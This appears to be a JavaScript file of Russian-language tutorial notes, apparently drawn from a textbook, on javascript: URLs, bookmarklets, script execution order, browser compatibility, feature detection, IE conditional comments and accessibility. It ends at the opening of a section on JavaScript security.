/*
JavaScript в URL - не сработало в браузерах.

Еще один способ исполнения JavaScript-кода на стороне клиента – написание этого кода в URL-адресе вслед за спецификатором псевдопротокола javascript:.

Этот специальный тип протокола обозначает, что тело URL-адреса представляет собою произвольный JavaScript-код, который должен быть выполнен интерпретатором JavaScript. URL-адрес интерпретируется как единственная строка и потому инструкции в ней должны быть отделены друг от друга точками с запятой,
а для комментариев следует использовать комбинации символов /* */, 
/*а не //.

Подобный URL-адрес может выглядеть, например, так:

javascript:var now = new Date(); "<h1>Время:</h1>" + now;

Когда броузер загружает такой URL-адрес, он исполняет содержащийся в нем код и использует строковое значение последней JavaScript-инструкции в качестве содержимого нового отображаемого документа. Это строковое значение может содержать HTML-теги, оно форматируется и отображается точно так же,
как любой другой документ, загруженный в броузер.

URL-адрес с JavaScript-кодом может также содержать JavaScript-инструкции,
выполняющие действия, но не возвращающие значения. Например:
javascript:alert("Hello World!")
Когда загружается подобный URL-адрес, броузер исполняет JavaScript-код, но
т. к. значения для вывода в новом документе нет, он не изменяет текущий документ.
Часто возникает необходимость использовать спецификатор javascript: в URL-адресе для исполнения некоторого кода без изменения текущего отображаемого
документа. Для этого необходимо, чтобы последняя инструкция в URL-адресе
не возвращала значение. Один из способов обеспечить отсутствие возвращаемого
значения состоит в том, чтобы посредством оператора void явно указать неопределенное возвращаемое значение. Просто в конец URL-адреса со спецификатором javascript: поместите инструкцию:
void 0;
Вот, например, как выглядит URL-адрес, открывающий новое пустое окно броузера без изменения содержимого текущего окна:

javascript:window.open("about:blank"); void 0;

Без оператора void в этом URL-адресе значение, возвращаемое вызванным методом Window.open(), было бы преобразовано в строку и отображено, в результате текущий документ был бы замещен документом, в котором присутствовало что-то
вроде следующего:

[object Window]


URL-адрес со спецификатором javascript: можно указывать везде, где используется обычный URL-адрес. Один из важных приемов применения этого синтаксиса – его ввод непосредственно в адресную строку броузера. Так можно проверять на исполнение произвольный JavaScript-код без необходимости открывать редактор и создавать HTML-файл с этим кодом.

Спецификатор псевдопротокола javascript: может использоваться в HTML-атрибутах везде, где используются строки URL-адресов. 

Атрибут href гиперссылки – одно из таких мест. Когда пользователь щелкает на такой ссылке, исполняется указанный JavaScript-код. В данном контексте URL-адрес со спецификатором javascript: является, по сути, заменой обработчика события onclick. 
(Следует отметить, что и использование обработчика события onclick или URL-адреса
со спецификатором javascript: в HTML-гиперссылках – это признак плохо продуманного дизайна; для нужд приложения следует применять кнопки и другие
элементы управления, а гиперссылки оставить только для загрузки новых документов.) 

Аналогичным образом URL-адрес со спецификатором javascript: может указываться в качестве значения 

атрибута action тега <form> – благодаря этому при принятии пользователем формы выполняется JavaScript-код.

URL-адрес со спецификатором javascript: может также передаваться методам,таким как 
Window.open() , которые ожидают получить строку URL-адреса в качестве аргумента.


Букмарклеты**********************************************

Одной из особенно важных областей применения URL-адресов со спецификатором javascript: являются закладки, где они выступают в качестве мини-программ на языке JavaScript, или букмарклетов (bookmarklet). 

Букмарклеты легко можно запустить из меню или панели инструментов с закладками. Следующий фрагмент кода в качестве значения атрибута href включает в себя тег <a>,
содержащий URL-адрес со спецификатором javascript:. 

Щелчок на ссылке открывает простейший обработчик JavaScript-выражений, который позволяет вы-
числять выражения и исполнять инструкции в контексте страницы:
*/

/*
<a href='javascript:
var e = "", r = ""; /* Вычисляемое выражение и результат */
do {
 /* Отобразить выражение и результат, а затем запросить новое выражение */ /*
 e = prompt("Выражение: " + e + "\n" + r + "\n", e);
 try { r = "Результат: " + eval(e); } /* Попробовать вычислить выражение */ /*
 catch(ex) { r = ex; } /* Или запомнить ошибку */ /*
} while(e); /* продолжать, пока не будет введено пустое выражение, */ 
 /* или щелкнуть на кнопке отмены */ /*
void 0; /* Это предотвращает замену текущего документа */ /*
'>
Обработчик JavaScript-выражений
</a>


*/
/*
Обратите внимание: несмотря на то, что этот программный код записан в нескольких строках, синтаксический анализатор обработает его как одну строку,
а потому однострочные комментарии (//) здесь работать не будут. Вот как выглядит тот же программный код после удаления лишних пробелов и комментариев:


<a href='javascript:var e="",r="";do{e=prompt("Выражение: "+e+"\n"+r+"\n",e);
try{r="Результат: "+eval(e);}catch(ex){r=ex;}}while(e);void 0;'>Обработчик
 JavaScript-выражений</a>

 /*
Ссылки, подобные этой, удобны, когда они «зашиты» в тело разрабатываемой
страницы, но еще более удобны, когда они хранятся как закладки, которые
можно запустить из любой страницы. Обычно закладки создаются щелчком правой кнопкой мыши на странице и выбором в контекстном меню пункта 
Добавить страницу в закладки 
или подобного ему. В броузере Firefox для этого достаточно просто перетащить ссылку на панель закладок.

Все приемы программирования на клиентском языке JavaScript,  в равной степени могут использоваться для создания букмарклетов. 
Если вас заинтересовали возможности этих маленьких программ, попробуйте выполнить поиск в Интернете по слову «bookmarklets».
 Вы найдете достаточное число сайтов, где есть
масса интересных и полезных букмарклетов.

Исполнение JavaScript-программ***************************

Ранее обсуждались механизмы интеграции JavaScript-кода
в HTML-файл. 
Теперь обсудим, как и когда интегрированный JavaScript-код исполняется интерпретатором JavaScript.

1.1. Сценарии

JavaScript-инструкции, расположенные между тегами 

<script> и </script>, 

исполняются в порядке их появления. 
Если в файле имеется более одного сценария, они исполняются в том порядке, в котором встречаются в документе (за исключением сценариев с атрибутом defer – такие сценарии IE исполняет не по порядку). 
Исполнение JavaScript-кода является частью процесса загрузки и разбора документа.

Любой тег <script>, в котором отсутствует атрибут defer, может вызывать метод
document.write() . Текст, переданный этому методу,
вставляется в документ непосредственно в то место, где находится сценарий в документе. Когда сценарий завершает работу, анализатор продолжает разбор HTML-документа, начиная с текста, который был выведен сценарием.

Сценарии могут присутствовать в разделах
 <head> или 
 <body> 
 HTML-документа.

 Обычно в разделе <head> определяются функции, вызываемые из других сценариев. 
 
 Здесь также могут объявляться и инициализироваться переменные, которые будут использоваться другим кодом.
 
Обычно в сценариях раздела <head> документа определяется единственная функция, которая затем регистрируется
как обработчик события onload для последующего исполнения.
 Вполне допустимо, хотя на практике почти не встречается, обращение к методу document.write()
в разделе <head>.

Сценарии в теге <body> документа могут делать все то же самое, что сценарии в теге <head>. 
Однако здесь часто можно встретить вызов метода 
document.write().

Сценарии, размещенные в теге <body> документа, могут также  обращаться к элементам и содержимому документа, находящимся перед сценарием, и изменять их. Однако, в момент исполнения сценария, находящегося в теге <body>, доступность и готовность элементов документа не гарантируется. 
Если сценарий просто определяет некоторые функции и переменные для последующего использования и не пытается изменить содержимое документа вызовом метода 
document.write() или каким-либо другим способом, в соответствии с общепринятыми соглашениями такой сценарий должен размещаться в теге <head>,
а не <body>.

Как уже упоминалось, IE исполняет сценарии с атрибутом defer не в порядке их следования. Отложенные сценарии запускаются после того, как отработают все
остальные сценарии и закончится полный разбор документа, но до того, как вызван обработчик события onload.

1.2. Обработчик события onload

После того как весь документ проанализирован, все сценарии исполнены и все дополнительное содержимое документа (например, изображения) загружено,
броузер инициирует событие onload и исполняет JavaScript-код, зарегистрированный как обработчик события onload объекта Window. 

Регистрация обработчика события onload может быть выполнена установкой атрибута onload тега <body>.

Но для отдельных модулей JavaScript-кода существует также возможность зарегистрировать собственные обработчики события onload . 

Если было зарегистрировано более одного обработчика
события onload, броузер вызовет их все, но при этом не гарантируется, что вызываться они будут в том же порядке, в котором были зарегистрированы.

К моменту вызова обработчика события onload документ должен быть уже полностью загружен и проанализирован, а потому допускать манипулирование любыми элементами документа из JavaScript-сценария. 
По этой причине JavaScript-модули, модифицирующие содержимое документа, обычно содержат функцию, которая выполняет модификацию, и программный код, который регистрирует обработчик события onload. Это гарантирует вызов функции только после того, как документ будет полностью загружен.

Поскольку обработчики события onload вызываются уже после того, как завершится анализ документа, они не должны вызывать метод document.write(). 
Любой такой вызов вместо того, чтобы добавить новое содержимое в конец существующего документа, просто уничтожит текущий документ и начнет заполнение
нового еще до того, как пользователь получит шанс просмотреть его.

1.3. Обработчики событий и URL-адреса в JavaScript

Когда загрузка и анализ документа завершаются, вызывается обработчик события onload и исполнение JavaScript-сценариев вступает в фазу исполнения по событиям. На протяжении всей этой фазы обработчики событий вызываются асинхронно в ответ на такие действия пользователя, как перемещение указателя мыши, щелчки кнопками мыши и нажатия клавиш. URL-адреса в JavaScript также могут вызываться асинхронно на протяжении всей этой фазы, когда, например,
пользователь щелкает на ссылке, в которой спецификатор псевдопротокола
javascript: указан в качестве значения атрибута href.

Теги <script> обычно используются для определения функций, а обработчики событий, как правило, вызывают эти функции в ответ на действия пользователя.

Конечно, обработчики событий также могут содержать определения функций,
но на практике такой подход обычно не используется.
Если обработчик события вызовет метод document.write() для документа, частью
которого он является, это уничтожит текущий документ и будет начат новый.
Обычно это совсем не то, что нужно, и на практике обработчики событий никогда не должны вызывать этот метод или функции, которые его вызывают. Исключение составляют многооконные приложения, в которых обработчик события одного окна может вызвать метод write() документа в другом окне. 


1.4. Обработчик события onunload*************************

Когда пользователь покидает веб-страницу, броузер вызывает обработчик события onunload, давая JavaScript-сценарию последнюю возможность выполнить заключительные действия. Определить обработчик события onunload можно в теге
<body> с помощью атрибута onunload, или зарегистрировав обработчик события.

Событие onunload позволяет отменить действия, выполненные обработчиком события onload или другими сценариями веб-страницы. Например, если JavaScript-
приложение открывает второе окно броузера, обработчик события onunload может, наоборот, закрывать это окно, когда пользователь покидает основную страницу. Обработчик события onunload не должен выполнять продолжительные по времени операции или вызывать всплывающие диалоговые окна. Заключительные операции должны выполняться максимально быстро, чтобы не препятствовать пользователю и не заставлять его долго ждать перехода на новую страницу.

1.5. Объект Window как контекст исполнения**************

Все сценарии, обработчики событий и URL-адреса в JavaScript в качестве глобального объекта совместно используют один и тот же объект Window. Переменные и функции в JavaScript – это не более чем свойства глобального объекта. 
Это означает, что функции, объявленные в одном теге <script>, могут вызываться
сценариями во всех последующих тегах <script>.

Поскольку обработка события onload не начинается до тех пор, пока не отработают все сценарии, каждый обработчик события onload обладает возможностью обращения к любым функциям и переменным, объявленным в сценариях документа.

Всякий раз, когда в окно броузера загружается новый документ, объект Window
переводится в состояние по умолчанию: любые свойства и функции, объявленные сценариями из предыдущего документа, удаляются и восстанавливаются
все переопределенные стандартные системные свойства. 

Каждый документ начинается с «чистого листа». Сценарии могут уверенно полагаться на это обстоятельство – они не унаследуют измененное окружение, оставшееся от предыдущего документа. Кроме того, это означает, что все переменные и функции, определяемые сценарием, будут существовать только до того момента, пока текущий
документ не замещен новым.


Срок жизни свойств объекта Window совпадает со сроком жизни документа, который содержит JavaScript-код и объявляет эти свойства. Объект Window обладает
более продолжительным временем жизни – он существует ровно столько, сколько существует соответствующее ему окно броузера. Ссылка на объект Window остается действительной независимо от того, сколько документов загружалось и выгружалось. Это верно только для веб-приложений, которые имеют несколько
окон или фреймов. 

В данном случае JavaScript-код из одного окна может использовать ссылку на другое окно или фрейм, причем эта ссылка останется работоспособной, даже если в другое окно или фрейм будет загружен новый документ.


1.6. Модель управления потоками исполнения в клиентском JavaScript*********************************************

Ядро языка JavaScript не имеет механизма одновременного исполнения нескольких потоков управления, и клиентский язык JavaScript не добавляет такой возможности. 

JavaScript-код на стороне клиента исполняется в единственном потоке управления. Синтаксический разбор документа останавливается, пока загружается и исполняется сценарий, а веб-броузер прекращает откликаться на действия пользователя на время исполнения обработчика события.
Исполнение в единственном потоке существенно упрощает разработку сценариев: можно писать программный код, пребывая в полной уверенности, что два обработчика событий никогда не запустятся одновременно. Можно манипулировать содержимым документа, точно зная, что никакой другой поток исполнения
не попытается изменить его в то же самое время.
Однако исполнение в единственном потоке накладывает определенные требования, т. е. сценарии и обработчики событий в JavaScript не должны исполняться
слишком долго. Если сценарий производит объемные и интенсивные вычисления, это вызовет задержку во время загрузки документа, и пользователь не увидит его содержимое, пока сценарий не закончит свою работу. Если продолжительные по времени операции выполняются в обработчике события, броузер может оказаться неспособным откликаться на действия пользователя, заставляя
его думать, что программа «зависла».

Если приложение должно выполнять достаточно сложные вычисления, вызывающие заметные задержки, то перед выполнением таких вычислений следует дать документу возможность полностью загрузиться. Кроме того, полезно предупредить пользователя, что будут производиться длительные вычисления, в процессе которых броузер может не откликаться на его действия. 
Если есть такая возможность, длительные вычисления следует разбить на несколько подзадач,
используя такие методы, как setTimeout() и setInterval(), для запуска подзадач в фоновом режиме с одновременным обновлением индикатора хода вычислений,
предоставляющего обратную связь с пользователем.

 В некоторых броузерах, таких как Firefox, имеются средства предотвращения атак типа отказа в обслуживании и случайных зацикливаний. 
 Благодаря этим
средствам в случае, когда сценарий или обработчик события исполняется длительное время, перед пользователем выводится окно запроса, позволяющее пре-
рвать исполнение зациклившегося кода.


1.7. Манипулирование документом в процессе загрузки******

В процессе загрузки и синтаксического анализа документа программный код JavaScript-сценария, расположенный в теге <script>, имеет возможность вставить содержимое в документ с помощью метода 
window.write(). 
Другие способы манипулирования документом, в которых используются приемы и методы DOM-программирования , в тегах <script> могут быть доступны или не доступны.

На первый взгляд большинство броузеров предоставляют сценариям возможность манипулировать любыми элементами документа, которые расположены перед тегом <script>. Некоторые JavaScript-программисты исходят из этого
предположения. Однако ни в одном стандарте такое положение вещей не регламентируется, и опытные JavaScript-программисты знают, что если не определено обратное, манипулирование элементами документа из сценариев, размещенных в тегах <script>, может вызывать проблемы (возможно лишь иногда, лишь в некоторых броузерах или лишь тогда, когда происходит перезагрузка документа или возврат к предыдущей странице после щелчка на кнопке Назад).

Единственное, что точно известно об этой темной области, – это то, что безопасно можно манипулировать документом лишь после возникновения события onload,
и это обстоятельство учитывается при разработке большинства JavaScript-приложений – в них событие onload служит «сигналом» для выполнения всех необходимых модификаций документа. 

Когда документ содержит большие изображения или много изображений, синтаксический разбор главного документа может завершиться задолго до того, как
будут загружены все изображения и произойдет событие onload. В этом случае может потребоваться начать модификации документа до возникновения события
onload. Один из способов (наиболее безопасный из обсуждаемых) заключается
в том, чтобы разместить программный код в конце документа. 
Для IE программный код можно поместить в тег <script> с установленными атрибутами defer и src,
а для Firefox – оформить его в виде недокументированного обработчика события
DOMContentLoad, которое возникает после разбора содержимого документа, но до
загрузки всех внешних объектов, таких как изображения.

Другая темная область модели исполнения JavaScript-кода касается вопроса, могут ли обработчики событий вызываться до того, как документ полностью загружен? 

До сих пор в нашем обсуждении модели исполнения JavaScript-кода мы придерживались мнения, что все обработчики событий всегда вызываются только после того, как отработают все сценарии. Так обычно и происходит, но никакие стандарты не требуют этого. Если документ очень объемный или загрузка документа происходит через медленное сетевое соединение, броузер может отобразить часть документа и позволить пользователю взаимодействовать с ним (и соответственно запускать обработчики событий) до того, как исполнены все сценарии
и вызван обработчик события onload. Если в такой ситуации обработчик события обратится к функции, которая еще не определена, он потерпит неудачу. Впрочем,
на практике это случается достаточно редко, потому предпринимать дополнительных усилий для реализации разного рода защитных мер не требуется.



Совместимость на стороне клиента*************************

Веб-броузер – это универсальная платформа для исполнения приложений, а JavaScript – язык программирования, на котором эти приложения разрабатываются. 

К счастью, язык JavaScript относится к разряду стандартизованных и широко поддерживаемых – все современные веб-броузеры поддерживают стандарт
ECMAScript v3. Чего, впрочем, нельзя сказать о самой платформе. Конечно, все веб-броузеры могут отображать HTML-документы, но они отличаются друг от
друга полнотой поддержки других стандартов, таких как CSS и DOM. И хотя все
современные броузеры включают совместимые реализации интерпретатора JavaScript, они имеют отличия в прикладном программном интерфейсе (Application Programming Interface, API), доступном для клиентского JavaScript-кода.

Проблемы совместимости – это просто неприятный факт из жизни программистов, использующих клиентский язык JavaScript. Разрабатываемый и распространяемый вами JavaScript-код может исполняться на различных версиях разных броузеров и в разных операционных системах. 

Рассмотрим наиболее часто
встречающиеся комбинации операционных систем и броузеров: Internet Explorer
в Windows и Mac OS1; Firefox для Windows, Mac OS и Linux; Safari для Mac OS
и Opera для Windows, Mac OS и Linux. Если у вас появится желание реализовать
поддержку всех этих броузеров, плюс две предыдущие версии каждого из них,
умножьте эти девять комбинаций броузера и ОС на три, всего получится 27 комбинаций броузера, версии и ОС. 

Единственный способ убедиться, что ваши веб-приложения будут безошибочно исполняться в любой из 27 комбинаций, – проверить каждую комбинацию. Это титанический труд, но на практике тестирование
часто производится пользователями уже после развертывания приложения.
Прежде чем в процессе разработки приложения перейти к фазе тестирования,
необходимо написать программный код. Поэтому при программировании на языке JavaScript знание существующих несовместимостей в броузерах является
чрезвычайно важным для создания совместимого программного кода. К сожалению, составление списка всех известных несовместимостей между производителями, версиями и платформами является непомерно сложной задачей. Это далеко выходит за рамки темы  и моих собственных познаний, до сих
пор еще ни разу не предпринимались попытки разработать полномасштабные
наборы тестов для клиентского JavaScript. 

Некоторую информацию о совместимости броузеров можно найти в Интернете, причем два сайта я нахожу наиболее
полезными:
http://www.quirksmode.org/dom/
Это сайт независимого веб-разработчика Питера-Пауля Коха (Piter-Paul Koch).
Его таблицы совместимости с DOM отражают уровень соответствия различных броузеров стандартам W3C DOM.

http://webdevout.net/browser_support.php
Это сайт Дэвида Хаммонда (David Hammond). Он напоминает сайт quirksmode.org, но здесь вы найдете более полные и более свежие (на момент написания этих строк) таблицы совместимости. В дополнение к совместимости
с DOM здесь также приводятся оценки соответствия броузеров стандартам
HTML, CSS и ECMAScript.
Конечно, выяснить о существовании несовместимости – это лишь первый шаг.

Версия IE для Mac OS постепенно сходит со сцены, и это благо, поскольку данный броузер заметно отличается от версии IE для Windows.


Происхождение несовместимости****************************

При JavaScript-программировании на стороне клиента всегда приходилось сталкиваться с проблемой несовместимости. Знание истории даст вам понимание
происходящего, что, безусловно, пригодится в работе. 

Ранние дни веб-программирования были отмечены так называемой «войной броузеров» между Netscape
и Microsoft. Это был период бурного развития броузеров и API-интерфейсов клиентского JavaScript, часто в несовместимых направлениях. Проблемы несовместимости в этот период проявлялись наиболее остро, и некоторые сайты для их преодоления просто сообщали своим посетителям, какой броузер они должны
использовать.
Война броузеров завершилась, когда корпорация Microsoft заняла доминирующее положение на рынке, а веб-стандарты, такие как CSS и DOM, стали приобретать все большее влияние. В период стабильности (или застоя), продолжавшийся, пока броузер Netscape медленно трансформировался в Firefox, Microsoft внесла в свой броузер несколько улучшений. Поддержка стандартов в обоих броузерах достигла высокого уровня или, по крайней мере, достаточного, чтобы обеспечивать совместимость будущим веб-приложениям.

Потом были свидетели нового взрыва нововведений в броузерах. Например, все основные броузеры ныне поддерживают возможность отправки HTTP-запросов, что составляет основу новой архитектуры веб-приложений под названием Ajax .

Корпорация Microsoft ведет работы над созданием версии 7 своего броузера Internet Explorer, в которой должны быть решены многие проблемы безопасности и совместимости с CSS. В IE 7 обычный пользователь найдет множество изменений, но очевидно, что в этом броузере не будет нарушено никаких новых
стандартов, составляющих основу веб-разработки. Однако в других броузерах
такие нарушения уже наблюдаются. Например, Safari и Firefox поддерживают
тег <canvas>, предназначенный для создания графических изображений на стороне клиента . 

Консорциум производителей броузеров (в котором, что примечательно, корпорация Microsoft не представлена), из-
вестный как WHATWG (whatwg.org), работает над стандартизацией тега <canvas> и многих других расширений HTML и DOM.


Несколько слов о «современных броузерах»*****************

Тема клиентского JavaScript весьма изменчива, особенно  К моменту написания этих строк в набор «современных броузеров» входили: Firefox 1.0, Firefox 1.5, IE 5.5, IE 6.0, Safari 2.0, Opera 8 и Opera 8.5. Это не гарантирует, что каждое сделанное в книге утверждение о «современных броузерах» в равной степени будет верным для каждого из
этих конкретных броузеров. Тем не менее это дает вам возможность знать, какие
броузеры считались современными во время этой работы .


Проверка особенностей***********************************

Проверка особенностей (иногда называемая проверкой функциональных возможностей) – это очень мощная методика, позволяющая справиться с проблемами совместимости. Особенность, или функциональная возможность, которую
вы собираетесь использовать, может поддерживаться не всеми броузерами, поэтому необходимо включать в свои сценарии программный код, который будет
проверять факт поддержки данной особенности. Если требуемая особенность не
поддерживается на текущей платформе, тогда можно будет либо не использовать эту особенность на данной платформе, либо разработать альтернативный
программный код, одинаково работоспособный на всех платформах.

В следующих главах вы часто будете видеть, что та или иная особенность проверяется снова и снова. Например, в главе 17 приводится программный код, который выглядит примерно следующим образом:
*/

if (element.addEventListener) { // Проверить наличие метода W3C перед вызовом
 element.addEventListener("keydown", handler, false);
 element.addEventListener("keypress", handler, false);
}
else if (element.attachEvent) { // Проверить наличие метода IE перед вызовом
 element.attachEvent("onkeydown", handler);
 element.attachEvent("onkeypress", handler);
}
else { // В противном случае использовать универсальный прием
 element.onkeydown = element.onkeypress = handler;
}

/*
В главе 20 описывается еще один подход к проверке особенностей: перебирать доступные альтернативы, пока не будет обнаружена та, которая не генерирует исключение! А после обнаружения работоспособной альтернативы она запоминается для последующего использования. Вот как выглядит фрагмент из примера 20.1:
*/

// Список функций создания объекта XMLHttpRequest, которые следует опробовать
HTTP._factories = [
 function() { return new XMLHttpRequest(); },
 function() { return new ActiveXObject("Msxml2.XMLHTTP"); },
 function() { return new ActiveXObject("Microsoft.XMLHTTP"); }
];
// Когда обнаружится работоспособный метод, запомнить его здесь
HTTP._factory = null;
// Создать и вернуть новый объект XMLHttpRequest.
//
// При первом обращении пробовать вызывать функции из списка, пока не будет
// обнаружена та, которая возвращает непустое значение и не генерирует
// исключение. Когда будет обнаружена работоспособная функция, запомнить
// ее для последующего использования.
HTTP.newRequest = function() { /* тело функции опущено */ }

/*
Для проверки версии DOM, поддерживаемой броузером, используется несколько устаревший способ проверки особенностей, который довольно часто еще можно встретить в существующем программном коде. Обычно его можно встретить в DHTML-коде, и выглядит он примерно так:
*/

if (document.getElementById) { // Если поддерживается W3C DOM API,
 // исполнить DHTML-код, использующий W3C DOM API
}
else if (document.all) { // Если поддерживается IE 4 API,
 // исполнить DHTML-код, использующий IE 4 API
}
else if (document.layers) { // Если поддерживается Netscape 4 API,
 // исполнить DHTML-эффект (максимум, что нам доступно)
 // с использованием Netscape 4 API
}
else { // В противном случае DHTML не поддерживается,
 // поэтому следует предоставить статичную альтернативу DHTML
}

/*
Подобный подход считается устаревшим, потому что все современные броузеры
поддерживают стандарт W3C DOM и его функцию 
document.getElementById().

Самое главное, что дает проверка особенностей, – это программный код, который
не привязан к конкретным броузерам или их версиям. Этот прием работает со
всеми броузерами, существующими ныне, и должен продолжить работать с будущими версиями броузеров независимо от того, какой набор особенностей они
реализуют. Однако следует отметить, что при этом производители броузеров не
должны определять свойства и методы, не обладающие полной функциональностью. Если бы корпорация Microsoft определила метод addEventHandler(), реализовав спецификации W3C лишь частично, это привело бы к нарушениям работоспособности большого числа сценариев, в которых перед вызовом addEventHandler() реализован механизм проверки особенностей.

Свойство document.all, показанное в следующем примере, заслуживает отдельного упоминания. 

Массив document.all впервые появился в Microsoft IE 4. Он позволил JavaScript-коду обращаться ко всем элементам документа и стал предвестником новой эры разработки клиентских сценариев. Тем не менее он так
и не был стандартизован и был заменен методом 
document.getElementById(). В настоящее время он по-прежнему встречается в сценариях и часто (хотя и неправильно) служит для того, чтобы выяснить, исполняется сценарий под управлением IE или нет:
*/


if (document.all) {
 // Сценарий исполняется в IE
}
else {
 // Сценарий исполняется в каком-то другом броузере
}

/*
Поскольку до сих пор существует большое число сценариев, использующих
свойство document.all, в броузер Firefox была добавлена поддержка этого свойства, чтобы Firefox мог исполнять те фрагменты программного кода, которые ранее были доступны только для IE. Поскольку присутствие свойства all часто
служит для определения типа броузера, Firefox имитирует отсутствие этого
свойства. Таким образом, даже при том, что Firefox поддерживает свойство document.all, инструкция if в следующем фрагменте сценария ведет себя так, как если бы свойство all не существовало, благодаря чему этот сценарий выводит диалоговое окно с надписью «Firefox».
*/

if (document.all) alert("IE"); else alert("Firefox");

/*
Данный пример демонстрирует, что механизм проверки особенностей не работает, если броузер активно сопротивляется этому! Кроме того, этот пример показывает, что веб-разработчики не единственные, кого мучает проблема совместимости. Производители броузеров также вынуждены идти на всякие хитрости с целью обеспечения совместимости.


Проверка типа броузера***********************************

Методика проверки особенностей прекрасно подходит для определения поддерживаемых функциональных возможностей броузера. Ее можно использовать,
например, чтобы выяснить, какая модель обработки событий поддерживается,
W3C или IE. В то же время, иногда может потребоваться обойти те или иные
ошибки, свойственные конкретному типу броузеров, когда нет достаточно простого способа определить наличие этих ошибок. В этом случае бывает необходимо разработать программный код, который должен исполняться только в броузерах определенного производителя, определенного номера версии или в конкретной операционной системе (либо в некоторой комбинации всех трех признаков).

На стороне клиента сделать это можно с помощью объекта Navigator. Программный код, который определяет производителя и версию броузера, часто называют 

анализатором броузера (browser sniffer),

или анализатором клиента (client sniffer). 

 Методика определения типа клиента широко использовалась на ранних этапах развития Всемирной паутины, когда Netscape и IE имели серьезные отличия и были несовместимы. Ныне ситуация с совместимостью стабилизировалась, анализ типа клиента утратил свою актуальность
и проводится лишь в тех случаях, когда это действительно необходимо.
Примечательно, что определение типа клиента может быть выполнено также на
стороне сервера, благодаря чему веб-сервер на основе строки идентификации
броузера, которая передается серверу в заголовке 

User-Agent, 

может выяснить,
какой JavaScript-код требуется отсылать.


Условные комментарии в Internet Explorer****************

На практике вы можете обнаружить, что большинство несовместимостей, которые необходимо учитывать при разработке клиентских сценариев, обусловлены
спецификой броузера IE. Вследствие этого иногда возникает необходимость создавать программный код отдельно для IE и отдельно для всех остальных броузеров. Хотя обычно нужно стараться избегать применения нестандартных расширений, присущих конкретному типу броузера, броузер IE поддерживает возможность создания условных комментариев в JavaScript-коде, что может оказаться
полезным.
В следующем примере демонстрируется, как выглядят условные комментарии
в HTML. Примечательно, что вся хитрость заключается в комбинации символов, закрывающих комментарий.

<!--[if IE]>
Эти строки фактически находятся внутри HTML-комментария.
Они будут отображаться только в IE.
<![endif]-->
<!--[if gte IE 6]>
Эта строка будет отображена только в IE 6 или более поздних версиях.
<![endif]-->
<!--[if !IE]> <-->
Это обычное HTML-содержимое, но IE не будет отображать его
из-за комментариев, что расположены выше и ниже.
<!--> <![endif]-->
Это обычное содержимое, которое будет отображаться всеми броузерами.
Условные комментарии также поддерживаются интерпретатором JavaScript в IE,
а программисты, знакомые с языком C/C++, найдут их похожими на инструкции препроцессора 
#ifdef/#endif. 

Условные JavaScript-комментарии в IE начинаются с комбинации символов /*@cc_on и завершаются комбинацией @*/. 

/*
(Префиксы «cc» и «cc_on» происходят от фразы «condition compilation», т. е. «условная компиляция».) Следующий условный комментарий содержит программный
код, который может быть исполнен только в IE:


/*@cc_on
    @if (@_jscript)
        // Следующий код находится внутри JS-комментария, но IE исполнит его.
        alert("In IE");
    @end
 @*/

 /*
Внутри условных комментариев могут указываться ключевые слова 
@if, 
@else
и @end, 
предназначенные для отделения программного кода, который должен исполняться интерпретатором JavaScript в IE по определенному условию. В большинстве случаев вам достаточно будет использовать показанное в предыдущем
фрагменте условие @if (@_jscript). 

JScript – это название интерпретатора JavaScript, которое было дано ему в Microsoft, а переменная @_jscript в IE всегда имеет значение true.
При грамотном чередовании условных и обычных JavaScript-комментариев можно определить, какой блок программного кода должен исполняться в IE, а какой
во всех остальных броузерах:



/*@cc_on
     @if (@_jscript)

     // Этот блок кода находится внутри условного комментария,
        // который также является обычным JavaScript-комментарием. В IE этот блок
        // будет выполнен, а в других броузерах - нет.
        
        alert('Вы пользуетесь Internet Explorer');
 @else*/
         // Этот блок уже не находится внутри JavaScript-комментария, но по-прежнему
        // находится внутри условного комментария IE. Вследствие этого данный
        // блок кода будет выполнен всеми броузерами, за исключением IE.
 
        alert('Вы не пользуетесь Internet Explorer');
    /*@end
@*/

/*
Условные комментарии в HTML и JavaScript совершенно не стандартизованы,
но иногда они могут оказаться полезными в обеспечении совместимости с IE.


 Доступность******************************************

Всемирная паутина представляет собой замечательный инструмент распространения информации, и JavaScript-сценарии могут сделать эту информацию максимально доступной. Однако JavaScript-программисты должны проявлять осторожность: слишком просто написать такой JavaScript-код, который сделает невозможным восприятие информации для пользователей с ограниченными возможностями.


Пользователи с ослабленным зрением применяют такие «вспомогательные технологии», как программы чтения с экрана, когда слова, выводимые на экран,
преобразуются в речевые аналоги. Некоторые программы чтения с экрана способны распознавать JavaScript-код, другие лучше работают, когда режим исполнения JavaScript-сценариев отключен. Если вы разрабатываете сайт, который
требует исполнения JavaScript-кода на стороне клиента для отображения информации, вы ограничиваете доступность своего сайта для пользователей подобных программ чтения с экрана. (Кроме того, вы ограничиваете доступность сво-
его сайта для всех тех, кто просматривает Интернет с помощью мобильных устройств, таких как сотовые телефоны, не поддерживающие JavaScript, а также
для тех, кто преднамеренно отключил режим исполнения JavaScript-сценариев в броузере.) Главная цель JavaScript заключается в улучшении представления
информации, а не собственно в ее представлении. Основное правило JavaScript-программирования заключается в том, что веб-страница, в которую встроен JavaScript-код, должна оставаться работоспособной (хотя бы ограниченно), даже
когда интерпретатор JavaScript отключен.

Другое важное замечание относительно доступности касается пользователей,
которые могут работать с клавиатурой, но не могут (или не хотят) применять
указывающие устройства, такие как мышь. Если программный код ориентирован на события, возникающие от действий мышью, вы ограничиваете доступность страницы для тех, кто не пользуется мышью. 
Веб-броузеры позволяют задействовать клавиатуру для перемещения и активации веб-страниц, то же самое
должен позволять делать JavaScript-код. Одновременно с этим не следует писать программный код, который ориентирован исключительно на ввод с клавиатуры,
иначе страница окажется недоступной для тех, у кого нет клавиатуры, например для пользователей наладонных компьютеров или сотовых телефонов.

 наряду с поддержкой событий, зависящих от типа устройства, таких как 
 onmouseover или 
 onmousedown, 
 JavaScript обладает поддержкой событий, от типа устройства не зависящих, таких как 
 onfocus и 
 onchange. 
 
 Для достижения максимальной доступности следует отдавать предпочтение событиям, не зависящим от типа устройства.

Создание максимально доступных веб-страниц – нетривиальная задача, не имеющая четких решений. 
 не прекращаются споры о том, как с помощью JavaScript сделать веб-страницы не менее, а более доступными.
 
 
 Безопасность в JavaScript******************************

 Проблема обеспечения безопасности в Интернете – это очень обширная и сложная тема. В данном разделе рассматриваются вопросы безопасности клиентского
JavaScript-кода.


Чего не может JavaScript********************************

Наличие интерпретаторов JavaScript в веб-броузерах означает, что загружаемая
